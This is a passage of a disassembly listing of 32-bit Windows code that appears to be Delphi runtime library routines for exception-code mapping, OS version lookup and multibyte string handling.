jmp short loc_4000B46C
; ---------------------------------------------------------------------------
loc_4000B425: ; CODE XREF: sub_4000B3F0+7�j
cmp eax, 0C0000096h
jg short loc_4000B43D
jz short loc_4000B463
sub eax, 0C0000093h
jz short loc_4000B45D
dec eax
jz short loc_4000B44B
dec eax
jz short loc_4000B451
jmp short loc_4000B46C
; ---------------------------------------------------------------------------
loc_4000B43D: ; CODE XREF: sub_4000B3F0+3A�j
sub eax, 0C00000FDh
jz short loc_4000B469
sub eax, 3Dh
jz short loc_4000B466
jmp short loc_4000B46C
; ---------------------------------------------------------------------------
loc_4000B44B: ; CODE XREF: sub_4000B3F0+46�j
mov al, 3
retn
; ---------------------------------------------------------------------------
loc_4000B44E: ; CODE XREF: sub_4000B3F0+20�j
mov al, 4
retn
; ---------------------------------------------------------------------------
loc_4000B451: ; CODE XREF: sub_4000B3F0+49�j
mov al, 5
retn
; ---------------------------------------------------------------------------
loc_4000B454: ; CODE XREF: sub_4000B3F0+9�j
; sub_4000B3F0+2F�j
mov al, 6
retn
; ---------------------------------------------------------------------------
loc_4000B457: ; CODE XREF: sub_4000B3F0+12�j
mov al, 7
retn
; ---------------------------------------------------------------------------
loc_4000B45A: ; CODE XREF: sub_4000B3F0+31�j
mov al, 8
retn
; ---------------------------------------------------------------------------
loc_4000B45D: ; CODE XREF: sub_4000B3F0+23�j
; sub_4000B3F0+43�j
mov al, 9
retn
; ---------------------------------------------------------------------------
loc_4000B460: ; CODE XREF: sub_4000B3F0+19�j
mov al, 0Bh
retn
; ---------------------------------------------------------------------------
loc_4000B463: ; CODE XREF: sub_4000B3F0+3C�j
mov al, 0Ch
retn
; ---------------------------------------------------------------------------
loc_4000B466: ; CODE XREF: sub_4000B3F0+57�j
mov al, 0Dh
retn
; ---------------------------------------------------------------------------
loc_4000B469: ; CODE XREF: sub_4000B3F0+52�j
mov al, 0Eh
retn
; ---------------------------------------------------------------------------
loc_4000B46C: ; CODE XREF: sub_4000B3F0+25�j
; sub_4000B3F0+33�j ...
mov al, 16h
retn
sub_4000B3F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000B470 proc near ; DATA XREF: sub_4000B72C+56�o
; .bss:off_4001C00C�o
push ebx
mov ebx, eax
mov eax, ebx
call sub_4000B3F0
movzx eax, al
mov eax, dword_4001A93C[eax*8]
pop ebx
retn
sub_4000B470 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B488 proc near ; CODE XREF: sub_4000B654+52�p
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_15C = dword ptr -15Ch
var_158 = byte ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_130 = dword ptr -130h
var_12C = byte ptr -12Ch
var_125 = byte ptr -125h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFE90h
push ebx
push esi
xor eax, eax
mov [ebp+var_170], eax
mov [ebp+var_14C], eax
mov [ebp+var_154], eax
mov [ebp+var_150], eax
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_4000B643
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+arg_0]
mov ebx, [eax-4]
cmp dword ptr [ebx+14h], 0
jnz short loc_4000B4D9
lea edx, [ebp+var_4]
mov eax, off_4001B0CC
call sub_400062F0
jmp short loc_4000B4E6
; ---------------------------------------------------------------------------
loc_4000B4D9: ; CODE XREF: sub_4000B488+40�j
lea edx, [ebp+var_4]
mov eax, off_4001B01C
call sub_400062F0
loc_4000B4E6: ; CODE XREF: sub_4000B488+4F�j
mov esi, [ebx+18h]
push 1Ch
lea eax, [ebp+var_20]
push eax
mov eax, [ebx+0Ch]
push eax
call sub_40006648 ; VirtualQuery
cmp [ebp+var_10], 1000h
jnz loc_4000B5B8
push 105h
lea eax, [ebp+var_125]
push eax
mov eax, [ebp+var_1C]
push eax
call sub_40006598 ; GetModuleFileNameA
test eax, eax
jz loc_4000B5B8
mov eax, [ebx+0Ch]
mov [ebp+var_148], eax
mov [ebp+var_144], 5
lea eax, [ebp+var_150]
lea edx, [ebp+var_125]
mov ecx, 105h
call sub_40004AF4
mov eax, [ebp+var_150]
lea edx, [ebp+var_14C]
call sub_400080B0
mov eax, [ebp+var_14C]
mov [ebp+var_140], eax
mov [ebp+var_13C], 0Bh
mov eax, [ebp+var_4]
mov [ebp+var_138], eax
mov [ebp+var_134], 0Bh
mov [ebp+var_130], esi
mov [ebp+var_12C], 5
lea eax, [ebp+var_148]
push eax
push 3
lea edx, [ebp+var_154]
mov eax, off_4001B060
call sub_400062F0
mov ecx, [ebp+var_154]
mov dl, 1
mov eax, ds:off_40007440
call sub_4000B06C
mov ebx, eax
jmp short loc_4000B612
; ---------------------------------------------------------------------------
loc_4000B5B8: ; CODE XREF: sub_4000B488+77�j
; sub_4000B488+94�j
mov eax, [ebx+0Ch]
mov [ebp+var_16C], eax
mov [ebp+var_168], 5
mov eax, [ebp+var_4]
mov [ebp+var_164], eax
mov [ebp+var_160], 0Bh
mov [ebp+var_15C], esi
mov [ebp+var_158], 5
lea eax, [ebp+var_16C]
push eax
push 2
lea edx, [ebp+var_170]
mov eax, off_4001B020
call sub_400062F0
mov ecx, [ebp+var_170]
mov dl, 1
mov eax, ds:off_40007440
call sub_4000B06C
mov ebx, eax
loc_4000B612: ; CODE XREF: sub_4000B488+12E�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000B64A
loc_4000B61F: ; CODE XREF: sub_4000B488+1C0�j
lea eax, [ebp+var_170]
call sub_40004884
lea eax, [ebp+var_154]
mov edx, 3
call sub_400048A8
lea eax, [ebp+var_4]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000B643: ; DATA XREF: sub_4000B488+2B�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000B61F
; ---------------------------------------------------------------------------
loc_4000B64A: ; CODE XREF: sub_4000B488+1BA�j
; DATA XREF: sub_4000B488+192�o
mov eax, ebx
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000B488 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B654 proc near ; CODE XREF: sub_400040D8+33�p
; .text:40004498�p
; DATA XREF: ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
push ebx
xor edx, edx
mov [ebp+var_10], edx
mov [ebp+var_4], eax
xor eax, eax
push ebp
push offset loc_4000B70D
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4000B3F0
movzx eax, al
mov edx, eax
add edx, 0FFFFFFFDh
sub edx, 8
jb short loc_4000B68E
jz short loc_4000B6A5
dec edx
sub edx, 0Ah
jnb short loc_4000B6B0
loc_4000B68E: ; CODE XREF: sub_4000B654+30�j
lea eax, dword_4001A93C[eax*8]
mov ecx, [eax+4]
mov eax, [eax]
mov dl, 1
call sub_4000B030
mov ebx, eax
jmp short loc_4000B6E0
; ---------------------------------------------------------------------------
loc_4000B6A5: ; CODE XREF: sub_4000B654+32�j
push ebp
call sub_4000B488
pop ecx
mov ebx, eax
jmp short loc_4000B6E0
; ---------------------------------------------------------------------------
loc_4000B6B0: ; CODE XREF: sub_4000B654+38�j
mov eax, [ebp+var_4]
mov eax, [eax]
mov [ebp+var_C], eax
mov [ebp+var_8], 0
lea eax, [ebp+var_C]
push eax
push 0
lea edx, [ebp+var_10]
mov eax, off_4001AEE0
call sub_400062F0
mov ecx, [ebp+var_10]
mov dl, 1
mov eax, ds:off_40006FB0
call sub_4000B06C
mov ebx, eax
loc_4000B6E0: ; CODE XREF: sub_4000B654+4F�j
; sub_4000B654+5A�j
mov eax, ebx
mov edx, ds:off_40006F58
call sub_40003E74
test al, al
jz short loc_4000B6F7
mov eax, [ebp+var_4]
mov [ebx+0Ch], eax
loc_4000B6F7: ; CODE XREF: sub_4000B654+9B�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_4000B714
loc_4000B704: ; CODE XREF: sub_4000B654+BE�j
lea eax, [ebp+var_10]
call sub_40004884
retn
; ---------------------------------------------------------------------------
loc_4000B70D: ; DATA XREF: sub_4000B654+12�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4000B704
; ---------------------------------------------------------------------------
loc_4000B714: ; CODE XREF: sub_4000B654+B8�j
; DATA XREF: sub_4000B654+AB�o
mov eax, ebx
pop ebx
mov esp, ebp
pop ebp
retn
sub_4000B654 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_4000B71C proc near ; CODE XREF: .text:400044B4�p
; DATA XREF: sub_4000B72C+3E�o ...
call sub_4000AF68
mov eax, 1
call sub_4000486C
sub_4000B71C endp
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
sub_4000B72C proc near ; CODE XREF: sub_400190AC:loc_400190F2�p
mov ecx, off_4001AF2C
mov dl, 1
mov eax, ds:off_40006EA4
call sub_4000B0EC
mov ds:dword_4001E91C, eax
mov ecx, off_4001AFFC
mov dl, 1
mov eax, ds:off_4000732C
call sub_4000B0EC
mov ds:dword_4001E920, eax
mov eax, off_4001AEEC
mov dword ptr [eax], offset sub_4000B2B0
mov eax, off_4001AF5C
mov dword ptr [eax], offset sub_4000B71C
mov eax, off_4001AF1C
mov edx, ds:off_40006DE0
mov [eax], edx
mov eax, off_4001AF54
mov dword ptr [eax], offset sub_4000B470
mov eax, off_4001AF60
mov dword ptr [eax], offset sub_4000B654
mov eax, offset sub_4000B3BC
mov edx, off_4001B00C
mov [edx], eax
mov eax, offset sub_4000B3D8
mov edx, off_4001AEDC
mov [edx], eax
retn
sub_4000B72C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000B7B0 proc near ; CODE XREF: sub_4000CC50+36�p
cmp ds:dword_4001E91C, 0
jz short loc_4000B7D3
mov eax, ds:dword_4001E91C
mov byte ptr [eax+0Ch], 1
mov eax, ds:dword_4001E91C
mov edx, [eax]
call dword ptr [edx-8]
xor eax, eax
mov ds:dword_4001E91C, eax
loc_4000B7D3: ; CODE XREF: sub_4000B7B0+7�j
cmp ds:dword_4001E920, 0
jz short loc_4000B7F6
mov eax, ds:dword_4001E920
mov byte ptr [eax+0Ch], 1
mov eax, ds:dword_4001E920
call sub_40003CE8
xor eax, eax
mov ds:dword_4001E920, eax
loc_4000B7F6: ; CODE XREF: sub_4000B7B0+2A�j
mov eax, off_4001AEEC
xor edx, edx
mov [eax], edx
mov eax, off_4001AF5C
xor edx, edx
mov [eax], edx
mov eax, off_4001AF1C
xor edx, edx
mov [eax], edx
mov eax, off_4001AF54
xor edx, edx
mov [eax], edx
mov eax, off_4001AF60
xor edx, edx
mov [eax], edx
mov eax, off_4001B00C
xor edx, edx
mov [eax], edx
retn
sub_4000B7B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000B830 proc near ; CODE XREF: sub_400190AC+55�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = byte ptr -80h
add esp, 0FFFFFF6Ch
mov [esp+94h+var_94], 94h
push esp
call sub_400065D8 ; GetVersionExA
test eax, eax
jz short loc_4000B897
mov eax, [esp+94h+var_84]
mov dword_4001A7E4, eax
mov eax, [esp+94h+var_90]
mov dword_4001A7E8, eax
mov eax, [esp+94h+var_8C]
mov dword_4001A7EC, eax
cmp dword_4001A7E4, 1
jnz short loc_4000B87B
mov eax, [esp+94h+var_88]
and eax, 0FFFFh
mov dword_4001A7F0, eax
jmp short loc_4000B884
; ---------------------------------------------------------------------------
loc_4000B87B: ; CODE XREF: sub_4000B830+39�j
mov eax, [esp+94h+var_88]
mov dword_4001A7F0, eax
loc_4000B884: ; CODE XREF: sub_4000B830+49�j
mov eax, offset dword_4001A7F4
lea edx, [esp+94h+var_80]
mov ecx, 80h
call sub_40004AF4
loc_4000B897: ; CODE XREF: sub_4000B830+15�j
add esp, 94h
retn
sub_4000B830 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000B8A0 proc near ; CODE XREF: sub_4000B914+1B�p
; sub_4000B938+B�p
push esi
push edi
mov edi, edx
xor edx, edx
test eax, eax
jz short loc_4000B90C
cmp byte ptr [eax+edi], 0
jz short loc_4000B90C
test edi, edi
jnz short loc_4000B8C7
movzx eax, byte ptr [eax]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000B90C
mov dl, 1
jmp short loc_4000B90C
; ---------------------------------------------------------------------------
loc_4000B8C7: ; CODE XREF: sub_4000B8A0+12�j
mov esi, edi
dec esi
jmp short loc_4000B8CD
; ---------------------------------------------------------------------------
loc_4000B8CC: ; CODE XREF: sub_4000B8A0+3F�j
dec esi
loc_4000B8CD: ; CODE XREF: sub_4000B8A0+2A�j
test esi, esi
jl short loc_4000B8E1
movzx ecx, byte ptr [eax+esi]
movzx ecx, cl
bt dword_4001A82C, ecx
jb short loc_4000B8CC
loc_4000B8E1: ; CODE XREF: sub_4000B8A0+2F�j
mov ecx, edi
sub ecx, esi
and ecx, 80000001h
jns short loc_4000B8F2
dec ecx
or ecx, 0FFFFFFFEh
inc ecx
loc_4000B8F2: ; CODE XREF: sub_4000B8A0+4B�j
test ecx, ecx
jnz short loc_4000B8FA
mov dl, 2
jmp short loc_4000B90C
; ---------------------------------------------------------------------------
loc_4000B8FA: ; CODE XREF: sub_4000B8A0+54�j
movzx eax, byte ptr [eax+edi]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000B90C
mov dl, 1
loc_4000B90C: ; CODE XREF: sub_4000B8A0+8�j
; sub_4000B8A0+E�j ...
mov eax, edx
pop edi
pop esi
retn
sub_4000B8A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000B914 proc near ; CODE XREF: sub_40008028+1C�p
; sub_4000805C+3C�p
push ebx
push esi
mov esi, edx
mov ebx, eax
xor eax, eax
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000B934
mov eax, ebx
call sub_40004D48
mov edx, esi
dec edx
call sub_4000B8A0
loc_4000B934: ; CODE XREF: sub_4000B914+F�j
pop esi
pop ebx
retn
sub_4000B914 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000B938 proc near ; CODE XREF: sub_4000828C+1B�p
; sub_4000BC30+4A�p ...
xor ecx, ecx
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000B94A
call sub_4000B8A0
mov ecx, eax
loc_4000B94A: ; CODE XREF: sub_4000B938+9�j
mov eax, ecx
retn
sub_4000B938 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000B950 proc near ; CODE XREF: sub_40009414+F8�p
push ebx
mov ebx, eax
mov ecx, ebx
test ecx, ecx
jz short loc_4000B95E
sub ecx, 4
mov ecx, [ecx]
loc_4000B95E: ; CODE XREF: sub_4000B950+7�j
cmp edx, ecx
jle short loc_4000B96D
mov edx, ebx
test edx, edx
jz short loc_4000B96D
sub edx, 4
mov edx, [edx]
loc_4000B96D: ; CODE XREF: sub_4000B950+10�j
; sub_4000B950+16�j
call sub_4000B974
pop ebx
retn
sub_4000B950 endp
; =============== S U B R O U T I N E =======================================
sub_4000B974 proc near ; CODE XREF: sub_4000B950:loc_4000B96D�p
push ebx
push esi
push edi
push ebp
mov ebp, edx
mov edi, eax
xor esi, esi
test ebp, ebp
jg short loc_4000B986
mov al, 1
jmp short loc_4000B996
; ---------------------------------------------------------------------------
loc_4000B986: ; CODE XREF: sub_4000B974+C�j
mov eax, edi
test eax, eax
jz short loc_4000B991
sub eax, 4
mov eax, [eax]
loc_4000B991: ; CODE XREF: sub_4000B974+16�j
cmp eax, ebp
setl al
loc_4000B996: ; CODE XREF: sub_4000B974+10�j
test al, al
jnz short loc_4000B9D4
mov esi, ebp
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000B9D4
mov ebx, 1
xor esi, esi
cmp ebp, ebx
jl short loc_4000B9D4
loc_4000B9B0: ; CODE XREF: sub_4000B974+5E�j
movzx eax, byte ptr [edi+ebx-1]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000B9CE
mov edx, ebx
mov eax, edi
call sub_4000BBC0
mov ebx, eax
jmp short loc_4000B9CF
; ---------------------------------------------------------------------------
loc_4000B9CE: ; CODE XREF: sub_4000B974+4B�j
inc ebx
loc_4000B9CF: ; CODE XREF: sub_4000B974+58�j
inc esi
cmp ebp, ebx
jge short loc_4000B9B0
loc_4000B9D4: ; CODE XREF: sub_4000B974+24�j
; sub_4000B974+2F�j ...
mov eax, esi
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000B974 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4000B9DC proc near ; CODE XREF: sub_4000BA6C+45�p
; sub_4000BAF0+3E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
push ebx
push esi
push edi
mov [ebp+var_8], ecx
mov [ebp+var_4], edx
mov edi, eax
mov eax, edi
test eax, eax
jz short loc_4000B9F8
sub eax, 4
mov eax, [eax]
loc_4000B9F8: ; CODE XREF: sub_4000B9DC+15�j
mov [ebp+var_C], eax
mov esi, 1
mov ebx, 1
jmp short loc_4000BA27
; ---------------------------------------------------------------------------
loc_4000BA07: ; CODE XREF: sub_4000B9DC+53�j
inc esi
movzx eax, byte ptr [edi+ebx-1]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000BA26
mov edx, ebx
mov eax, edi
call sub_4000BBC0
mov ebx, eax
jmp short loc_4000BA27
; ---------------------------------------------------------------------------
loc_4000BA26: ; CODE XREF: sub_4000B9DC+3B�j
inc ebx
loc_4000BA27: ; CODE XREF: sub_4000B9DC+29�j
; sub_4000B9DC+48�j
cmp ebx, [ebp+var_C]
jge short loc_4000BA31
cmp esi, [ebp+var_4]
jl short loc_4000BA07
loc_4000BA31: ; CODE XREF: sub_4000B9DC+4E�j
cmp esi, [ebp+var_4]
jnz short loc_4000BA58
cmp ebx, [ebp+var_C]
jge short loc_4000BA58
movzx eax, byte ptr [edi+ebx-1]
movzx eax, al
bt dword_4001A82C, eax
jnb short loc_4000BA58
mov edx, ebx
mov eax, edi
call sub_4000BBC0
dec eax
mov ebx, eax
loc_4000BA58: ; CODE XREF: sub_4000B9DC+58�j
; sub_4000B9DC+5D�j ...
mov eax, [ebp+var_8]
mov [eax], esi
mov eax, [ebp+arg_0]
mov [eax], ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_4000B9DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000BA6C proc near ; CODE XREF: sub_40009414+109�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFF8h
mov ebx, edx
mov esi, eax
xor eax, eax
mov [esp+14h+var_14], eax
test ebx, ebx
jg short loc_4000BA83
mov al, 1
jmp short loc_4000BA93
; ---------------------------------------------------------------------------
loc_4000BA83: ; CODE XREF: sub_4000BA6C+11�j
mov eax, esi
test eax, eax
jz short loc_4000BA8E
sub eax, 4
mov eax, [eax]
loc_4000BA8E: ; CODE XREF: sub_4000BA6C+1B�j
cmp eax, ebx
setl al
loc_4000BA93: ; CODE XREF: sub_4000BA6C+15�j
test al, al
jnz short loc_4000BAE4
cmp ebx, 1
jle short loc_4000BAE1
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000BAE1
push esp
lea ecx, [esp+18h+var_10]
mov edi, ebx
dec edi
mov edx, edi
mov eax, esi
call sub_4000B9DC
cmp edi, [esp+14h+var_10]
jle short loc_4000BAC0
mov al, 1
jmp short loc_4000BAD1
; ---------------------------------------------------------------------------
loc_4000BAC0: ; CODE XREF: sub_4000BA6C+4E�j
mov eax, esi
test eax, eax
jz short loc_4000BACB
sub eax, 4
mov eax, [eax]
loc_4000BACB: ; CODE XREF: sub_4000BA6C+58�j
cmp eax, [esp+14h+var_14]
setle al
loc_4000BAD1: ; CODE XREF: sub_4000BA6C+52�j
test al, al
jz short loc_4000BADC
xor eax, eax
mov [esp+14h+var_14], eax
jmp short loc_4000BAE4
; ---------------------------------------------------------------------------
loc_4000BADC: ; CODE XREF: sub_4000BA6C+67�j
inc [esp+14h+var_14]
jmp short loc_4000BAE4
; ---------------------------------------------------------------------------
loc_4000BAE1: ; CODE XREF: sub_4000BA6C+2E�j
; sub_4000BA6C+37�j
mov [esp+14h+var_14], ebx
loc_4000BAE4: ; CODE XREF: sub_4000BA6C+29�j
; sub_4000BA6C+6E�j ...
mov eax, [esp+14h+var_14]
pop ecx
pop edx
pop edi
pop esi
pop ebx
retn
sub_4000BA6C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000BAF0 proc near ; CODE XREF: sub_40009414+BF�p
; sub_40009414+131�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
push ebx
push esi
add esp, 0FFFFFFF8h
mov ebx, eax
xor eax, eax
mov [esp+10h+var_10], eax
test edx, edx
jle short loc_4000BB56
mov esi, ebx
mov eax, esi
test eax, eax
jz short loc_4000BB0D
sub eax, 4
mov eax, [eax]
loc_4000BB0D: ; CODE XREF: sub_4000BAF0+16�j
cmp eax, edx
jge short loc_4000BB1E
mov eax, esi
test eax, eax
jz short loc_4000BB1C
sub eax, 4
mov eax, [eax]
loc_4000BB1C: ; CODE XREF: sub_4000BAF0+25�j
mov edx, eax
loc_4000BB1E: ; CODE XREF: sub_4000BAF0+1F�j
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000BB53
push esp
lea ecx, [esp+14h+var_C]
mov eax, ebx
call sub_4000B9DC
mov eax, esi
test eax, eax
jz short loc_4000BB3E
sub eax, 4
mov eax, [eax]
loc_4000BB3E: ; CODE XREF: sub_4000BAF0+47�j
cmp eax, [esp+10h+var_10]
jge short loc_4000BB56
mov eax, esi
test eax, eax
jz short loc_4000BB4E
sub eax, 4
mov eax, [eax]
loc_4000BB4E: ; CODE XREF: sub_4000BAF0+57�j
mov [esp+10h+var_10], eax
jmp short loc_4000BB56
; ---------------------------------------------------------------------------
loc_4000BB53: ; CODE XREF: sub_4000BAF0+35�j
mov [esp+10h+var_10], edx
loc_4000BB56: ; CODE XREF: sub_4000BAF0+E�j
; sub_4000BAF0+51�j ...
mov eax, [esp+10h+var_10]
pop ecx
pop edx
pop esi
pop ebx
retn
sub_4000BAF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000BB60 proc near ; CODE XREF: sub_400096A8+7A�p
; sub_4000BB88+2F�p ...
push ebx
mov ebx, eax
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000BB76
push ebx
call sub_40006708 ; CharNextA
sub eax, ebx
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4000BB76: ; CODE XREF: sub_4000BB60+A�j
mov eax, 1
pop ebx
retn
sub_4000BB60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000BB80 proc near ; CODE XREF: sub_400096A8+8B�p
; sub_400096A8+9D�p ...
push eax
call sub_40006708 ; CharNextA
retn
sub_4000BB80 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000BB88 proc near ; CODE XREF: sub_4000ABA4+D2�p
push ebx
push esi
mov esi, edx
mov ebx, eax
mov eax, 1
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000BBBC
movzx edx, byte ptr [ebx+esi-1]
movzx edx, dl
bt dword_4001A82C, edx
jnb short loc_4000BBBC
mov eax, ebx
call sub_40004D48
add eax, esi
dec eax
call sub_4000BB60
loc_4000BBBC: ; CODE XREF: sub_4000BB88+12�j
; sub_4000BB88+23�j
pop esi
pop ebx
retn
sub_4000BB88 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000BBC0 proc near ; CODE XREF: sub_4000A0D4+1F�p
; sub_4000B974+51�p ...
push ebx
push esi
mov ebx, edx
mov esi, eax
lea eax, [ebx+1]
cmp byte ptr ds:dword_4001E8D4, 0
jz short loc_4000BBF4
movzx edx, byte ptr [esi+ebx-1]
movzx edx, dl
bt dword_4001A82C, edx
jnb short loc_4000BBF4
mov eax, esi
call sub_40004D48
add eax, ebx
dec eax
call sub_4000BB60
add eax, ebx
loc_4000BBF4: ; CODE XREF: sub_4000BBC0+10�j
; sub_4000BBC0+21�j
pop esi
pop ebx
retn
sub_4000BBC0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_4000BBF8 proc near ; CODE XREF: sub_4000A1CC+9D�p
push ebx
push esi
push edi
push ebp
mov esi, edx
mov ebx, eax
xor edi, edi
mov eax, ebx
call sub_40004D48
push eax
mov eax, esi
call sub_40004D48
mov ebp, eax
mov eax, ebp
pop edx
call sub_4000BC30
mov ebx, eax
test ebx, ebx
jz short loc_4000BC26
mov edi, ebx
sub edi, ebp
inc edi
loc_4000BC26: ; CODE XREF: sub_4000BBF8+27�j
mov eax, edi
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000BBF8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000BC30 proc near ; CODE XREF: sub_4000A11C+30�p
; sub_4000BBF8+1E�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
push ebx
push esi
push edi
push ebp
add esp, 0FFFFFFF8h
mov ebp, edx
mov esi, eax
xor ebx, ebx
test esi, esi
jz loc_4000BCC6
cmp byte ptr [esi], 0
jz short loc_4000BCC6
test ebp, ebp
jz short loc_4000BCC6
cmp byte ptr [ebp+0], 0
jz short loc_4000BCC6
mov eax, esi
call sub_4000815C
mov [esp+18h+var_18], eax
mov eax, ebp
call sub_4000815C
mov edi, eax
mov edx, ebp
mov eax, esi
call sub_40008238
mov ebx, eax
jmp short loc_4000BCB3
; ---------------------------------------------------------------------------
loc_4000BC74: ; CODE XREF: sub_4000BC30+92�j
mov edx, ebx
sub edx, esi
mov eax, esi
call sub_4000B938
mov [esp+18h+var_14], al
cmp [esp+18h+var_14], 2
jz short loc_4000BC9F
push edi
push ebp
push edi
push ebx
push 0
push 400h
call sub_400064F8 ; CompareStringA
cmp eax, 2
jz short loc_4000BCC6
loc_4000BC9F: ; CODE XREF: sub_4000BC30+58�j
cmp [esp+18h+var_14], 1
jnz short loc_4000BCA7
inc ebx
loc_4000BCA7: ; CODE XREF: sub_4000BC30+74�j
inc ebx
mov edx, ebp
mov eax, ebx
call sub_40008238
mov ebx, eax
loc_4000BCB3: ; CODE XREF: sub_4000BC30+42�j
test ebx, ebx
jz short loc_4000BCC4
mov eax, ebx
sub eax, esi
mov edx, [esp+18h+var_18]
sub edx, eax
cmp edi, edx
jbe short loc_4000BC74
loc_4000BCC4: ; CODE XREF: sub_4000BC30+85�j
xor ebx, ebx
loc_4000BCC6: ; CODE XREF: sub_4000BC30+F�j
; sub_4000BC30+18�j ...
mov eax, ebx
pop ecx
pop edx
pop ebp
pop edi
pop esi
pop ebx
retn
sub_4000BC30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4000BCD0 proc near ; CODE XREF: sub_4000ADE0+7E�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
mov edx, ebx
mov eax, esi
call sub_4000BD04
mov esi, eax
mov edi, esi
test bl, bl
jz short loc_4000BCFE
test esi, esi
jz short loc_4000BCFE
loc_4000BCEC: ; CODE XREF: sub_4000BCD0+2C�j
mov edi, esi
inc esi
mov edx, ebx
mov eax, esi
call sub_4000BD04
mov esi, eax
test esi, esi
jnz short loc_4000BCEC
loc_4000BCFE: ; CODE XREF: sub_4000BCD0+16�j
; sub_4000BCD0+1A�j
mov eax, edi
pop edi
pop esi
pop ebx
retn
sub_4000BCD0 endp
; =============== S U B R O U T I N E =======================================
sub_4000BD04 proc near ; CODE XREF: sub_4000BCD0+B�p
; sub_4000BCD0+23�p
push ebx
push esi
push edi
mov ebx, edx
mov esi, eax
mov edx, ebx
mov eax, esi
call sub_40008224
mov edi, eax
test edi, edi
jz short loc_4000BD3E
loc_4000BD1A: ; CODE XREF: sub_4000BD04+38�j
mov edx, edi
sub edx, esi
mov eax, esi
call sub_4000B938
sub al, 1
jb short loc_4000BD3E
jz short loc_4000BD2D
jmp short loc_4000BD2E
; ---------------------------------------------------------------------------
loc_4000BD2D: ; CODE XREF: sub_4000BD04+25�j
inc edi
loc_4000BD2E: ; CODE XREF: sub_4000BD04+27�j
inc edi
mov edx, ebx
mov eax, edi
call sub_40008224
mov edi, eax
test edi, edi
jnz short loc_4000BD1A
loc_4000BD3E: ; CODE XREF: sub_4000BD04+14�j
